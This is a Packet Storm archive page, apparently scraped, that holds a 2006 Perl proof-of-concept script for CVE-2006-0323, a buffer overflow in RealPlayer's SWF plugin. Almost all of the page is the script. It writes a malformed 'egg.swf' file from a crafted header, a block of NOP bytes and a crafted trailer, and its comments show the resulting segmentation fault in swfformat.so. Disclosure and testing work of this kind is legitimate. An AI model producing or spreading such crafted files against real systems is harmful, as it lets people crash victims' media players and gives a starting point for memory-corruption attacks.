Lucene search

K
packetstormFederico L. Bossi BoninPACKETSTORM:45093
HistoryApr 01, 2006 - 12:00 a.m.

realplayer-swf-PoC.pl.txt

2006-04-0100:00:00
Federico L. Bossi Bonin
packetstormsecurity.com
27

EPSS

0.968

Percentile

99.7%

`#!/usr/bin/perl  
###################################################  
# RealPlayer: Buffer overflow vulnerability / PoC  
#  
# CVE-2006-0323  
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323  
#  
# RealNetworks Advisory  
# http://service.real.com/realplayer/security/03162006_player/en/  
#  
# Federico L. Bossi Bonin   
# fbossi[at]netcomm.com.ar  
###################################################  
  
# Program received signal SIGSEGV, Segmentation fault.  
# [Switching to Thread -1218976064 (LWP 21932)]  
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so  
  
my $EGGFILE="egg.swf";  
my $header="\x46\x57\x53\x05\xCF\x00\x00\x00\x60";  
  
my $endheader="\x19\xe4\x7d\x1c\xaf\xa3\x92\x0c\x72\xc1\x80\x00\xa2\x08\x01".  
"\x00\x00\x00\x00\x01\x02\x00\x01\x00\x00\x00\x02\x03\x00\x02".  
"\x00\x00\x00\x04\x04\x00\x03\x00\x00\x00\x08\x05\x00\x04\x00".  
"\x00\x00\x00\x89\x06\x06\x01\x00\x01\x00\x16\xfa\x1f\x40\x40".  
"\x00\x00\x00";  
  
  
open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n";  
print EGG $header;  
  
for ($i = 0; $i < 135; $i++) {  
$buffer.= "\x90";  
}  
  
print EGG $buffer;  
print EGG $endheader;  
close(EGG);  
`